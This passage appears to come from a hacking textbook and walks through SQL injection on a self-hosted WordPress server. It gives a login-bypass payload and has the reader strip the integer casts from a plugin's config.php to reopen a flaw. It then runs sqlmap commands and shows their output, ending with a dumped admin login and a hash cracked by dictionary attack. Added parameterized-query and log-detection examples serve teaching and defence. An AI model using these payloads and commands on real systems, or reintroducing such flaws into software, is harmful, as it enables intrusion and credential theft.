SQL Injection attacks are carried out by inserting abnormal SQL code into a vulnerable application so that the program behaves in an unintended way. The attack code is usually inserted through a variable that receives and processes user input.
• General User Authentication Code

    // user input ($id, $pwd) is pasted straight into the SQL text (deliberately vulnerable)
    $query = "SELECT * FROM USER WHERE ID=$id and PWD=$pwd";
    $result = mysql_query($query, $connect);
• SQL Injection Code

Users typically log in with a username and password. If the user supplies the correct username and password, the Web server completes the authentication process successfully. Let's enter abnormal SQL code into the "id" field to perform a SQL Injection.

    1 OR 1=1 --
If the above code is entered in the "id" field, the normal SQL statement changes as follows.

• Modified SQL Statement

    SELECT * FROM USER WHERE ID=1 OR 1=1 -- and PWD=$pwd
If "ID = 1 OR 1 = 1" is entered into the conditional statement, the condition is true for every row, so the database returns all user records. The rest of the statement, including the password check, is commented out by "--". The SQL statement that handles user authentication is therefore disabled. Completing a successful SQL Injection usually requires trying many different values, and these repetitive tasks can be automated by writing a program. Python provides a variety of modules that can automate such tasks; sqlmap is the representative example.
Now, let's install sqlmap. Download the zip file from http://sqlmap.org and unzip it into the directory C:\Python27\sqlmap. sqlmap does not require a special installation process; it is sufficient to run the "sqlmap.py" file in that directory.
8-1 sqlmap.org
The WordPress site itself has been written with secure coding practices, so it is difficult to attack directly. To test the hacking tools, you must install a relatively vulnerable plugin. A variety of plugins can be found on the WordPress website.

For this test, let's download a video-related plugin. A security vulnerability in this plugin was disclosed not long ago, and although a security patch has been applied, a simple code change makes the plugin vulnerable again.

Installation is completed by copying the downloaded file into the "wordpress\wp-content\plugins" directory on the server PC and unzipping it. Then open the file (wordpress\wp-content\plugins\all-video-gallery\config.php) and modify the code. This file is part of the program that provides an environment display function.
    /* $_vid = (int) $_GET['vid']; */   // [original code] commented out
    /* $_pid = (int) $_GET['pid']; */   // [original code] commented out
    $_vid = $_GET['vid'];               // [modified code] "(int)" removed
    $_pid = $_GET['pid'];               // [modified code] "(int)" removed
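The two points above, the "1 OR 1=1 --" authentication bypass and the "(int)" cast that the config.php change removes, can be reproduced side by side. The following is an added example written for this page, not code from the book, the plugin or sqlmap. It uses an in-memory sqlite3 table (constructed here) in place of the page's USER table and shows three versions of the login query: the concatenated one from the page, one that rejects a non-integer id as the "(int)" cast does, and one that validates the type and binds parameters.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the page's USER table (two sample users).

    Passwords are stored in clear only to keep the demonstration short; a real
    application stores salted password hashes (WordPress uses phpass $P$ hashes).
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, login TEXT, pwd TEXT)")
    conn.executemany(
        "INSERT INTO user VALUES (?, ?, ?)",
        [(1, "admin", "correct horse"), (2, "python", "python")],
    )
    return conn


def login_vulnerable(conn, user_id: str, pwd: str) -> list:
    """Mirrors the page's $query: the id is pasted into the statement unquoted,
    so the input "1 OR 1=1 --" rewrites the WHERE clause and comments out the
    password check, returning every user."""
    query = f"SELECT login FROM user WHERE id={user_id} AND pwd='{pwd}'"
    return [row[0] for row in conn.execute(query)]


def login_int_cast(conn, user_id: str, pwd: str) -> list:
    """What the plugin's "(int) $_GET['vid']" cast buys: a non-numeric id never
    reaches the query. (PHP's cast would silently turn "1 OR 1=1 --" into 1;
    rejecting the value is the stricter choice.) The pwd value is still
    concatenated here, so this closes only the numeric hole."""
    try:
        id_int = int(user_id)
    except ValueError:
        return []
    query = f"SELECT login FROM user WHERE id={id_int} AND pwd='{pwd}'"
    return [row[0] for row in conn.execute(query)]


def login_parameterized(conn, user_id: str, pwd: str) -> list:
    """The correct fix: validate the type, then bind both values. The driver
    sends values separately from the SQL text, so no input can change the
    statement's structure."""
    try:
        id_int = int(user_id)
    except ValueError:
        return []
    query = "SELECT login FROM user WHERE id=? AND pwd=?"
    return [row[0] for row in conn.execute(query, (id_int, pwd))]


if __name__ == "__main__":
    db = make_db()
    payload = "1 OR 1=1 --"          # the page's injection string
    print("vulnerable:   ", login_vulnerable(db, payload, "wrong"))
    print("int cast:     ", login_int_cast(db, payload, "wrong"))
    print("parameterized:", login_parameterized(db, payload, "wrong"))
    print("legitimate:   ", login_parameterized(db, "2", "python"))
```

Running it shows the vulnerable query returning both users for the injected id while the other two return nothing; the legitimate login still works in every version. The point of the third function is that the cast alone is a partial measure (it says nothing about the password field), whereas bound parameters protect every value regardless of type.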
To use sqlmap, you should be familiar with its various options. The easiest way to learn them is to follow examples that can be found on the Internet. Read the sqlmap documentation after having used the software for some time, because it will then be much easier to understand. Let's proceed with sqlmap using the following process.
8-3 SQL Injection Process
With sqlmap, hacking proceeds step by step. The Web site is analyzed to find vulnerabilities one by one, starting from simple information. A SQL Injection attack is usually performed by following the five steps below.

(1) Searching URL: A SQL Injection attack hacks the system on the basis of the URL. It mainly targets the GET method, which sends user input placed after the URL. You can easily search for the target URL using Google. Various pages can be opened to observe the change in the URL. Some knowledge of HTML and JavaScript is useful at this point.

(2) Vulnerability Detection: The "sqlmap.py" program can be used to detect vulnerabilities in the URL. Since SQL Injection protection code has been applied to most web programs, many URLs must be collected to find a vulnerability. URLs can be collected with automated tools such as a Web crawler, which receives the source code of the web site and extracts the URLs it contains.

(3) Searching Table: If vulnerabilities are detected in the URL, the hacker can list the tables in the database with sqlmap. The names of the tables can provide important information.

(4) Searching Column: First select the table, then list the columns it contains. Column names are chosen to reflect the characteristics of the data, so it is easy to find a column that holds important information.

(5) Searching Data: Select a column to query the data it contains. If the data is stored as password hashes, sqlmap can attempt to recover the passwords with a dictionary attack.
A Web crawler can be used for this, so let's assume you have already found a vulnerable URL. The vulnerable URL is the "config.php" that provides environment information for the WordPress plugin. Let's now detect vulnerabilities in that URL. Open the command prompt, move to the "C:\Python27\sqlmap" directory, and enter the following command.

    C:\Python27\python sqlmap.py -u "http://server/wordpress/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=1" --level 3 --risk 3 --dbms mysql
There are a variety of options in sqlmap. First, let's look at the options used here. The "[-u]" option indicates the URL to be tested, and the "[--level]" option indicates the level of testing to be carried out.

[ level option ]
    0: Show only Python tracebacks, error and critical messages.
    1: Show also information and warning messages.
    2: Show also debug messages.
    3: Show also payloads injected.
    4: Show also HTTP requests.
    5: Show also HTTP responses' headers.
    6: Show also HTTP responses' page content.

(Note that the descriptions in this list are those of sqlmap's "-v" verbosity setting, which takes values 0 to 6. "--level" itself takes values 1 to 5 and controls how many tests are performed and which parameters are tried; the command above uses "--level 3".)
The "[--risk]" option assigns the risk level. If the risk level is high, the test has a high probability of causing a problem on the site.

[ risk option ]
    1: This is innocuous for the majority of SQL injection points. Default value.
       Normal Injection (union), Blind Injection (true: 1=1, false: 1=2)
    2: Adds to the default level the tests for heavy query time-based SQL injections.
    3: Adds also OR-based SQL injection tests.
The "[--dbms]" option specifies the database type. If you don't use this option, sqlmap runs the tests for every supported database. The database type is specified as mysql here for convenience. When asked whether a test should proceed, enter "y".
    [11:09:53] [WARNING] User-Agent parameter 'User-Agent' is not injectable
    sqlmap identified the following injection points with a total of 5830 HTTP(s) requests:
    ---
    Place: GET
    Parameter: vid
    Type: UNION query
    Title: MySQL UNION query (random number) - 18 columns
    Payload: vid=1 UNION ALL SELECT 9655,9655,9655,9655,9655,CONCAT(0x71657a7571,0x41596a4a4a6f68716454,0x716f747471),9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655#&pid=1

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: vid=1 AND 9762=BENCHMARK(5000000,MD5(0x6a537868))-- pOPC&pid=1

    Place: GET
    Parameter: pid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: vid=1&pid=1 AND 4391=4391

    Type: UNION query
    Title: MySQL UNION query (NULL) - 41 columns
    Payload: vid=1&pid=-2499 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71657a7571,0x71764d467a5352664d77,0x716f747471),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: vid=1&pid=1 AND SLEEP(5)
    ---
    there were multiple injection points, please select the one to use for following injections:
    [0] place: GET, parameter: vid, type: Unescaped numeric (default)
    [1] place: GET, parameter: pid, type: Unescaped numeric
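The injection points sqlmap reports above also show what the probes look like from the server side: UNION ... SELECT lists, SLEEP()/BENCHMARK() delays, tautologies such as "AND 4391=4391", and comment terminators, all arriving in the query string at a rate of thousands of requests (5830 here) from one client. The following is an added example, not code from the book or from sqlmap, that scans constructed Apache-style access-log lines (the IPs, timestamps and sizes are made up for the example) for those shapes and counts hits per client so that a scan like this one stands out in the log.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Signatures for the probe shapes seen in the sqlmap output above. They are
# applied to the URL-decoded query string, so "%20" and "+" become spaces first.
SIGNATURES = {
    "union_select": re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b", re.I),
    "time_based":   re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
    "tautology":    re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I),
    "comment":      re.compile(r"--\s|#"),
}

# Common log format: ip ident user [time] "METHOD url HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample: one normal request and four probes modelled on the
# payloads sqlmap printed above (spaces URL-encoded as a browser/tool would).
SAMPLE_LOG = [
    '192.0.2.7 - - [11/Oct/2023:11:09:50 +0900] "GET /wordpress/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=1 HTTP/1.1" 200 2048',
    '198.51.100.9 - - [11/Oct/2023:11:09:51 +0900] "GET /wordpress/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=1%20AND%204391=4391 HTTP/1.1" 200 2048',
    '198.51.100.9 - - [11/Oct/2023:11:09:52 +0900] "GET /wordpress/wp-content/plugins/all-video-gallery/config.php?vid=1%20AND%209762=BENCHMARK(5000000,MD5(0x6a537868))--%20pOPC&pid=1 HTTP/1.1" 200 2048',
    '198.51.100.9 - - [11/Oct/2023:11:09:53 +0900] "GET /wordpress/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=1%20AND%20SLEEP(5) HTTP/1.1" 200 2048',
    '198.51.100.9 - - [11/Oct/2023:11:09:54 +0900] "GET /wordpress/wp-content/plugins/all-video-gallery/config.php?vid=1%20UNION%20ALL%20SELECT%209655,9655,NULL%23&pid=1 HTTP/1.1" 200 2048',
]


def classify_query(url: str) -> list:
    """Return the names of the signatures that match the decoded query string."""
    query = unquote_plus(urlsplit(url).query)
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]


def scan_log(lines) -> list:
    """Return (ip, url, hits) for every request whose query string matches a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                     # not a request line we understand
        hits = classify_query(m.group("url"))
        if hits:
            findings.append((m.group("ip"), m.group("url"), hits))
    return findings


def noisy_clients(lines, threshold: int = 3) -> dict:
    """Clients with at least `threshold` flagged requests: one tool, many probes."""
    counts = Counter(ip for ip, _, _ in scan_log(lines))
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for ip, url, hits in scan_log(SAMPLE_LOG):
        print(ip, hits, url)
    print("noisy:", noisy_clients(SAMPLE_LOG))
```

The signatures are deliberately narrow (they key on SQL keywords followed by a parenthesis or a self-equality), which keeps false positives on ordinary parameters low; the per-client count is what turns a few matches into a clear scan finding. Decoding before matching matters: the same payload encoded as "%20" or "+" would otherwise slip past a raw-string check.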
Vulnerabilities have been discovered in "vid" and "pid". By varying the values entered for both variables, let's find a few more details. The vulnerability can now be used to list the tables in the database.

    C:\Python27\python sqlmap.py -u "http://server/wordpress/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=1" --level 3 --risk 3 --dbms mysql --tables
"[--tables]" is used to obtain the full list of tables. By adding this option, you can read the names of all the tables in the database. Let's manually find a table that contains user information.

    there were multiple injection points, please select the one to use for following injections:
    [0] place: GET, parameter: pid, type: Unescaped numeric (default)
    [1] place: GET, parameter: vid, type: Unescaped numeric
    [q] Quit
    > 0
    Database: phpmyadmin
    [8 tables]
    +------------------------------------------------+
    | pma_bookmark                                   |
    | pma_column_info                                |
    | pma_designer_coords                            |
    | pma_history                                    |
    | pma_pdf_pages                                  |
    | pma_relation                                   |
    | pma_table_coords                               |
    | pma_table_info                                 |
    +------------------------------------------------+
    Database: wordpress
    [16 tables]
    +------------------------------------------------+
    | prg_connect_config                             |
    | prg_connect_sent                               |
    | wp_allvideogallery_categories                  |
    | wp_allvideogallery_profiles                    |
    | wp_allvideogallery_videos                      |
    | wp_commentmeta                                 |
    | wp_comments                                    |
    | wp_links                                       |
    | wp_options                                     |
    | wp_postmeta                                    |
    | wp_posts                                       |
    | wp_term_relationships                          |
    | wp_term_taxonomy                               |
    | wp_terms                                       |
    | wp_usermeta                                    |
    | wp_users                                       |
    +------------------------------------------------+
8-7 Searching Table Result
When asked which injection point to use midway through, enter "0". Browsing the list of tables manually, the "wp_users" table is the one most likely to contain user information. If the table selection turns out to be wrong, you can choose a different table. Now you can extract the list of columns in the table.

    C:\Python27\python sqlmap.py -u "http://server/wordpress/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=1" --level 3 --risk 3 --dbms mysql -T wp_users --columns
The "[-T]" option selects a table, and the "[--columns]" option lists the columns in that table. In general, the characteristics of the data are reflected in the column name, so a hacker can check the column names and find the relevant columns.

    Database: wordpress
    Table: wp_users
    [10 columns]
    +-----------------------------+----------------------+
    | Column                      | Type                 |
    +-----------------------------+----------------------+
    | display_name                | varchar(250)         |
    | ID                          | bigint(20) unsigned  |
    | user_activation_key         | varchar(60)          |
    | user_email                  | varchar(100)         |
    | user_login                  | varchar(60)          |
    | user_nicename               | varchar(50)          |
    | user_pass                   | varchar(64)          |
    | user_registered             | datetime             |
    | user_status                 | int(11)              |
    | user_url                    | varchar(100)         |
    +-----------------------------+----------------------+
Let's now look at the list of columns that has been retrieved. The "user_login" and "user_pass" columns store the user ID and password hash, respectively. Obtaining just these two columns is enough to take over the site. Let's extract the login information.

    C:\Python27\python sqlmap.py -u "http://server/wordpress/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=1" --level 3 --risk 3 --dbms mysql -T wp_users --columns -C user_login,user_pass --dump
The "[-C]" option selects columns; multiple columns are separated by commas. The "[--dump]" option then extracts all of the data stored in those columns.

    do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
    do you want to crack them via a dictionary-based attack? [Y/n/q] y
    Database: wordpress
    Table: wp_users
    [1 entry]
    +---------------------------------------------+----------------------+
    | user_pass                                   | user_login           |
    +---------------------------------------------+----------------------+
    | $P$BfKYXQB9dz5b6BJl0F6qy6lRG1bRai0 (python) | python               |
    +---------------------------------------------+----------------------+
8-11 Data Extraction Result
You will be asked two questions during this process: whether to store the hashes, and whether to crack them with a dictionary attack. Answer "y" to both. sqlmap's built-in dictionary attack then recovers the password from the hash, as shown in parentheses next to it. The extracted ID and password are the values that were entered during program installation. Now you have the administrator account.